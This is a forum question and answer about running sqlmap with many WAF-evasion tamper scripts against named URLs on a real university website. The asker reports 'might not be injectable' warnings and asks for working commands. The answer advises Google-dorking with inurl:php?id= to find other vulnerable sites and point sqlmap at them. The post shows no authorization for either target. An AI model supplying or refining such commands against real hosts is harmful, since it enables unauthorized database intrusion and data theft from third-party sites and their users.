sql-injection sqlmap

Sqlmap parameter "might not be injectable"


I'm starting with sqlmap and I have the following doubt: when I try to use sqlmap (trying to bypass a WAF) using this snippet:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?option=com_newsfeeds&view=newsfeed&id=1&feedid=1&Itemid=18" --dbs --dbms=mysql --time-sec=10 --hex --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

or this one:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?view=article&catid=35:pagina-principal&id=44:inicio-central&format=pdf" --dbs --dbms=mysql --time-sec=10 --hex --string --regexp --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

I saw that the following appears in the console:

[WARNING] heuristic (basic) test shows that GET parameter 'option' might not be injectable
[WARNING] heuristic (basic) test shows that GET parameter 'view' might not be injectable

I also tried to find a URL inside my site similar to http://www.cafe53rd.com/menu.php?item_id=3, because I checked that this kind of URL is the easiest to access, but I can't find one for the site I'm auditing.

What would be the right code to do this on the following site ("http://prefing...")?

Sorry for my bad English. Thank you very much.


Solution

  • This error just suggests that the type of injection technique being executed does not give positive responses. I already faced it and solved it by getting an alternate link. I suggest finding some other vulnerable links, using the search inurl:php?id=, and then inserting the link in sqlmap.